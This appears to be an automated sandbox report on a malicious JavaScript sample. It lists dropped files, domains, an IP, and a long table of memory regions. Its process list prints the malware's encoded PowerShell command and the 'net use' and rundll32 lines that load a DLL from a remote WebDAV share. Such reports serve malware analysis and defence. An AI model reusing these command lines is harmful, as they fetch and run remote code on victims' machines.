Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
1770711382873314149.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbkefjot.scl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ocblkxbj.fhu.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1770711382873314149.js"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==
|
|
|
|
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\2915890629211.dll,Entry
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
endpointexperiment.com
|
94.159.113.48
|
|
|
|
s-part-0023.t-0009.fb-t-msedge.net
|
13.107.253.51
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.159.113.48
|
endpointexperiment.com
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
229F8E9B000
|
heap
|
page read and write
|
||
|
20A669B1000
|
heap
|
page read and write
|
||
|
2D8687A000
|
stack
|
page read and write
|
||
|
223CADA5000
|
heap
|
page read and write
|
||
|
6180F7E000
|
stack
|
page read and write
|
||
|
223CB20B000
|
trusted library allocation
|
page read and write
|
||
|
1F22FB9A000
|
heap
|
page read and write
|
||
|
618107E000
|
stack
|
page read and write
|
||
|
20A68693000
|
heap
|
page read and write
|
||
|
20A669A6000
|
heap
|
page read and write
|
||
|
20A68694000
|
heap
|
page read and write
|
||
|
20A669AF000
|
heap
|
page read and write
|
||
|
223CB496000
|
trusted library allocation
|
page read and write
|
||
|
223C9320000
|
trusted library allocation
|
page read and write
|
||
|
20A68680000
|
heap
|
page read and write
|
||
|
EB7F57C000
|
stack
|
page read and write
|
||
|
7FF887B00000
|
trusted library allocation
|
page read and write
|
||
|
229F8D77000
|
heap
|
page read and write
|
||
|
20A66C30000
|
heap
|
page read and write
|
||
|
223DB0F1000
|
trusted library allocation
|
page read and write
|
||
|
7FF8878C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
20A669CC000
|
heap
|
page read and write
|
||
|
1F22FAD0000
|
heap
|
page read and write
|
||
|
1F22FB10000
|
heap
|
page read and write
|
||
|
20A669C7000
|
heap
|
page read and write
|
||
|
20A686C3000
|
heap
|
page read and write
|
||
|
20A68688000
|
heap
|
page read and write
|
||
|
223CB5F6000
|
trusted library allocation
|
page read and write
|
||
|
20A686CA000
|
heap
|
page read and write
|
||
|
61811FF000
|
stack
|
page read and write
|
||
|
20A66940000
|
heap
|
page read and write
|
||
|
223C9340000
|
heap
|
page read and write
|
||
|
223CB10D000
|
trusted library allocation
|
page read and write
|
||
|
1F22FB60000
|
heap
|
page read and write
|
||
|
2D868FE000
|
stack
|
page read and write
|
||
|
1F22FAF0000
|
heap
|
page read and write
|
||
|
2D8697E000
|
stack
|
page read and write
|
||
|
84DD5FF000
|
stack
|
page read and write
|
||
|
229F8D80000
|
heap
|
page read and write
|
||
|
223CB246000
|
trusted library allocation
|
page read and write
|
||
|
229F8D7B000
|
heap
|
page read and write
|
||
|
7FF887B70000
|
trusted library allocation
|
page read and write
|
||
|
223DB160000
|
trusted library allocation
|
page read and write
|
||
|
20A686A7000
|
heap
|
page read and write
|
||
|
20A686B7000
|
heap
|
page read and write
|
||
|
20A686AC000
|
heap
|
page read and write
|
||
|
20A6696C000
|
heap
|
page read and write
|
||
|
223CB1FD000
|
trusted library allocation
|
page read and write
|
||
|
223E33AA000
|
heap
|
page read and write
|
||
|
20A686A4000
|
heap
|
page read and write
|
||
|
61812F9000
|
stack
|
page read and write
|
||
|
EB7F47E000
|
stack
|
page read and write
|
||
|
20A68694000
|
heap
|
page read and write
|
||
|
223C9401000
|
heap
|
page read and write
|
||
|
223E33CF000
|
heap
|
page read and write
|
||
|
7FF887970000
|
trusted library allocation
|
page read and write
|
||
|
1F22FB9A000
|
heap
|
page read and write
|
||
|
223CB5C0000
|
trusted library allocation
|
page read and write
|
||
|
223C91A0000
|
heap
|
page read and write
|
||
|
7FF887A71000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B20000
|
trusted library allocation
|
page read and write
|
||
|
229F8D30000
|
heap
|
page read and write
|
||
|
223DB100000
|
trusted library allocation
|
page read and write
|
||
|
223CB599000
|
trusted library allocation
|
page read and write
|
||
|
84DD4FE000
|
stack
|
page read and write
|
||
|
1F22FB68000
|
heap
|
page read and write
|
||
|
223E3410000
|
heap
|
page read and write
|
||
|
84DCD74000
|
stack
|
page read and write
|
||
|
1F22FB50000
|
remote allocation
|
page read and write
|
||
|
20A68D99000
|
heap
|
page read and write
|
||
|
7FF88797C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887AE0000
|
trusted library allocation
|
page read and write
|
||
|
223C92A0000
|
heap
|
page read and write
|
||
|
223E3300000
|
heap
|
page execute and read and write
|
||
|
20A66C3A000
|
heap
|
page read and write
|
||
|
1F22F9F0000
|
heap
|
page read and write
|
||
|
223E3430000
|
heap
|
page read and write
|
||
|
7FF887976000
|
trusted library allocation
|
page read and write
|
||
|
20A68698000
|
heap
|
page read and write
|
||
|
1F22FB70000
|
heap
|
page read and write
|
||
|
618117E000
|
stack
|
page read and write
|
||
|
223C92E0000
|
heap
|
page read and write
|
||
|
223E352C000
|
heap
|
page read and write
|
||
|
20A686C4000
|
heap
|
page read and write
|
||
|
20A68698000
|
heap
|
page read and write
|
||
|
223CAC80000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AD0000
|
trusted library allocation
|
page read and write
|
||
|
84DDAFB000
|
stack
|
page read and write
|
||
|
229F8DA8000
|
heap
|
page read and write
|
||
|
20A68682000
|
heap
|
page read and write
|
||
|
7FF887AA2000
|
trusted library allocation
|
page read and write
|
||
|
229F8C30000
|
heap
|
page read and write
|
||
|
7FF887B50000
|
trusted library allocation
|
page read and write
|
||
|
223CB0F1000
|
trusted library allocation
|
page read and write
|
||
|
1F22FB50000
|
remote allocation
|
page read and write
|
||
|
223E3552000
|
heap
|
page read and write
|
||
|
84DD3FE000
|
stack
|
page read and write
|
||
|
20A686A0000
|
heap
|
page read and write
|
||
|
6180FFF000
|
stack
|
page read and write
|
||
|
1F22FBFE000
|
heap
|
page read and write
|
||
|
7FF887B30000
|
trusted library allocation
|
page read and write
|
||
|
20A6868B000
|
heap
|
page read and write
|
||
|
20A68D91000
|
heap
|
page read and write
|
||
|
223E3520000
|
heap
|
page read and write
|
||
|
229F8D7F000
|
heap
|
page read and write
|
||
|
229F8D10000
|
heap
|
page read and write
|
||
|
229F8D68000
|
heap
|
page read and write
|
||
|
223CB4A9000
|
trusted library allocation
|
page read and write
|
||
|
20A669CC000
|
heap
|
page read and write
|
||
|
20A686A7000
|
heap
|
page read and write
|
||
|
20A686C5000
|
heap
|
page read and write
|
||
|
223CADA0000
|
heap
|
page read and write
|
||
|
7FF8878CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
229F8D93000
|
heap
|
page read and write
|
||
|
2D869FE000
|
stack
|
page read and write
|
||
|
1F22FBFB000
|
heap
|
page read and write
|
||
|
EB7F4FB000
|
stack
|
page read and write
|
||
|
84DD6FD000
|
stack
|
page read and write
|
||
|
20A68AC3000
|
heap
|
page read and write
|
||
|
20A686B7000
|
heap
|
page read and write
|
||
|
223E3510000
|
heap
|
page read and write
|
||
|
20A669C7000
|
heap
|
page read and write
|
||
|
229F8D84000
|
heap
|
page read and write
|
||
|
20A686CB000
|
heap
|
page read and write
|
||
|
7FF887BD0000
|
trusted library allocation
|
page read and write
|
||
|
20A68ACA000
|
heap
|
page read and write
|
||
|
20A6868C000
|
heap
|
page read and write
|
||
|
61815BE000
|
stack
|
page read and write
|
||
|
229F8D7F000
|
heap
|
page read and write
|
||
|
20A686A7000
|
heap
|
page read and write
|
||
|
61814BC000
|
stack
|
page read and write
|
||
|
20A68690000
|
heap
|
page read and write
|
||
|
20A6869C000
|
heap
|
page read and write
|
||
|
20A686C9000
|
heap
|
page read and write
|
||
|
223CB200000
|
trusted library allocation
|
page read and write
|
||
|
20A68687000
|
heap
|
page read and write
|
||
|
20A686B7000
|
heap
|
page read and write
|
||
|
20A66C3C000
|
heap
|
page read and write
|
||
|
223CB1FA000
|
trusted library allocation
|
page read and write
|
||
|
223E33B8000
|
heap
|
page read and write
|
||
|
20A668F0000
|
heap
|
page read and write
|
||
|
1F22FB95000
|
heap
|
page read and write
|
||
|
20A68690000
|
heap
|
page read and write
|
||
|
20A66995000
|
heap
|
page read and write
|
||
|
223CB187000
|
trusted library allocation
|
page read and write
|
||
|
223CACD0000
|
heap
|
page execute and read and write
|
||
|
1F22FB8D000
|
heap
|
page read and write
|
||
|
20A686B7000
|
heap
|
page read and write
|
||
|
20A686C3000
|
heap
|
page read and write
|
||
|
223C93AF000
|
heap
|
page read and write
|
||
|
229FA780000
|
heap
|
page read and write
|
||
|
1F22FB50000
|
remote allocation
|
page read and write
|
||
|
7FF887AB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20A686D0000
|
heap
|
page read and write
|
||
|
223E3348000
|
heap
|
page read and write
|
||
|
223C9459000
|
heap
|
page read and write
|
||
|
223C93DB000
|
heap
|
page read and write
|
||
|
20A686B7000
|
heap
|
page read and write
|
||
|
20A6868B000
|
heap
|
page read and write
|
||
|
1F22FBF3000
|
heap
|
page read and write
|
||
|
20A669C7000
|
heap
|
page read and write
|
||
|
1F22FB95000
|
heap
|
page read and write
|
||
|
7FF887BE0000
|
trusted library allocation
|
page read and write
|
||
|
223C93B1000
|
heap
|
page read and write
|
||
|
7FF887B90000
|
trusted library allocation
|
page read and write
|
||
|
223C9280000
|
heap
|
page read and write
|
||
|
20A686C5000
|
heap
|
page read and write
|
||
|
20A691C0000
|
heap
|
page read and write
|
||
|
223C9350000
|
trusted library allocation
|
page read and write
|
||
|
223C93AD000
|
heap
|
page read and write
|
||
|
223C940A000
|
heap
|
page read and write
|
||
|
6180EFE000
|
stack
|
page read and write
|
||
|
229F8D60000
|
heap
|
page read and write
|
||
|
61810FD000
|
stack
|
page read and write
|
||
|
229F8D8B000
|
heap
|
page read and write
|
||
|
7FF8878C2000
|
trusted library allocation
|
page read and write
|
||
|
223CAD90000
|
heap
|
page read and write
|
||
|
223CB172000
|
trusted library allocation
|
page read and write
|
||
|
EB7F10A000
|
stack
|
page read and write
|
||
|
223CB62C000
|
trusted library allocation
|
page read and write
|
||
|
EB7F18E000
|
stack
|
page read and write
|
||
|
7FF887A7A000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B40000
|
trusted library allocation
|
page read and write
|
||
|
84DD9FE000
|
stack
|
page read and write
|
||
|
20A687F2000
|
heap
|
page read and write
|
||
|
20A686C3000
|
heap
|
page read and write
|
||
|
20A686BA000
|
heap
|
page read and write
|
||
|
20A68681000
|
heap
|
page read and write
|
||
|
1F22FC04000
|
heap
|
page read and write
|
||
|
223C93DD000
|
heap
|
page read and write
|
||
|
61813B7000
|
stack
|
page read and write
|
||
|
1F22FBF9000
|
heap
|
page read and write
|
||
|
1F22FB97000
|
heap
|
page read and write
|
||
|
7FF887980000
|
trusted library allocation
|
page execute and read and write
|
||
|
20A686A7000
|
heap
|
page read and write
|
||
|
223CAD50000
|
heap
|
page execute and read and write
|
||
|
20A6868C000
|
heap
|
page read and write
|
||
|
20A686CC000
|
heap
|
page read and write
|
||
|
7FF887A80000
|
trusted library allocation
|
page execute and read and write
|
||
|
84DD0FE000
|
stack
|
page read and write
|
||
|
6180E73000
|
stack
|
page read and write
|
||
|
7FF887B10000
|
trusted library allocation
|
page read and write
|
||
|
229F8E95000
|
heap
|
page read and write
|
||
|
20A686B4000
|
heap
|
page read and write
|
||
|
7DF40E040000
|
trusted library allocation
|
page execute and read and write
|
||
|
20A66C3C000
|
heap
|
page read and write
|
||
|
20A66C35000
|
heap
|
page read and write
|
||
|
618173B000
|
stack
|
page read and write
|
||
|
84DD1FE000
|
stack
|
page read and write
|
||
|
223C9360000
|
heap
|
page readonly
|
||
|
1F22FC04000
|
heap
|
page read and write
|
||
|
20A66870000
|
heap
|
page read and write
|
||
|
7FF887BB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
20A686B9000
|
heap
|
page read and write
|
||
|
20A686B7000
|
heap
|
page read and write
|
||
|
229FC0D3000
|
heap
|
page read and write
|
||
|
229F8D8E000
|
heap
|
page read and write
|
||
|
20A669CC000
|
heap
|
page read and write
|
||
|
20A66770000
|
heap
|
page read and write
|
||
|
7FF887BC0000
|
trusted library allocation
|
page read and write
|
||
|
1F22FBFF000
|
heap
|
page read and write
|
||
|
223C93E1000
|
heap
|
page read and write
|
||
|
7FF8878C4000
|
trusted library allocation
|
page read and write
|
||
|
223E3880000
|
heap
|
page read and write
|
||
|
20A66C3B000
|
heap
|
page read and write
|
||
|
223CB158000
|
trusted library allocation
|
page read and write
|
||
|
20A6868B000
|
heap
|
page read and write
|
||
|
20A686CC000
|
heap
|
page read and write
|
||
|
223C9370000
|
heap
|
page read and write
|
||
|
223E33A2000
|
heap
|
page read and write
|
||
|
7FF887B60000
|
trusted library allocation
|
page read and write
|
||
|
229F8DA0000
|
heap
|
page read and write
|
||
|
2D86A7F000
|
stack
|
page read and write
|
||
|
1F22FB8D000
|
heap
|
page read and write
|
||
|
223CB20E000
|
trusted library allocation
|
page read and write
|
||
|
618127F000
|
stack
|
page read and write
|
||
|
618133E000
|
stack
|
page read and write
|
||
|
618153E000
|
stack
|
page read and write
|
||
|
20A66850000
|
heap
|
page read and write
|
||
|
7FF8879A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
6181437000
|
stack
|
page read and write
|
||
|
223CB1F7000
|
trusted library allocation
|
page read and write
|
||
|
1F22FB15000
|
heap
|
page read and write
|
||
|
20A669A9000
|
heap
|
page read and write
|
||
|
223C9345000
|
heap
|
page read and write
|
||
|
20A686A7000
|
heap
|
page read and write
|
||
|
7FF887AF0000
|
trusted library allocation
|
page read and write
|
||
|
20A686B4000
|
heap
|
page read and write
|
||
|
223E33E6000
|
heap
|
page read and write
|
||
|
229FC520000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B80000
|
trusted library allocation
|
page read and write
|
||
|
229F8E90000
|
heap
|
page read and write
|
||
|
229FC0D0000
|
heap
|
page read and write
|
||
|
229FC000000
|
heap
|
page read and write
|
||
|
20A68693000
|
heap
|
page read and write
|
||
|
223E3307000
|
heap
|
page execute and read and write
|
||
|
7FF887BA0000
|
trusted library allocation
|
page read and write
|
||
|
20A686C8000
|
heap
|
page read and write
|
||
|
223E3310000
|
heap
|
page read and write
|
||
|
20A66C3C000
|
heap
|
page read and write
|
||
|
223CB24D000
|
trusted library allocation
|
page read and write
|
||
|
20A68684000
|
heap
|
page read and write
|
||
|
61816BE000
|
stack
|
page read and write
|
||
|
20A686AC000
|
heap
|
page read and write
|
||
|
1F22FC04000
|
heap
|
page read and write
|
||
|
223CB211000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AC0000
|
trusted library allocation
|
page read and write
|
||
|
20A686C3000
|
heap
|
page read and write
|
||
|
223C93FE000
|
heap
|
page read and write
|
||
|
7FF8878D0000
|
trusted library allocation
|
page read and write
|
||
|
20A686BA000
|
heap
|
page read and write
|
||
|
223CB13A000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A60000
|
trusted library allocation
|
page read and write
|
||
|
7FF8879E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20A68685000
|
heap
|
page read and write
|
||
|
84DD7FE000
|
stack
|
page read and write
|
||
|
20A686A7000
|
heap
|
page read and write
|
||
|
223CB10F000
|
trusted library allocation
|
page read and write
|
||
|
223C9379000
|
heap
|
page read and write
|
||
|
223C9382000
|
heap
|
page read and write
|
||
|
20A68681000
|
heap
|
page read and write
|
There are 272 hidden memdumps, click here to show them.